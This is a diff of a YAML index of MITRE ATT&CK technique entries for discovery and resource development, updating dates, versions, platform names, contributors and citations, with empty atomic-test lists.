-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -51102,17 +51790,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -51120,10 +51807,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51132,15 +51821,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -51168,9 +51858,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -51245,7 +51932,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51317,7 +52003,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -51366,12 +52051,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51392,12 +52076,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51422,7 +52105,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51477,7 +52159,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51497,7 +52179,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51600,13 +52281,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51617,7 +52297,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51688,29 +52368,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -51734,15 +52413,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51774,17 +52456,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51837,11 +52518,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51877,7 +52557,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -51926,43 +52606,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -51975,18 +52624,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -52008,7 +52688,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52024,8 +52704,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -52047,7 +52725,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52067,8 +52745,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -52107,7 +52783,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52128,8 +52804,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -52159,7 +52833,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52196,8 +52870,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52219,7 +52891,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52241,8 +52913,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52279,7 +52949,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52301,8 +52971,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52364,7 +53032,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52386,7 +53053,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52404,8 +53071,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52440,7 +53105,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52459,33 +53124,31 @@ resource-development:
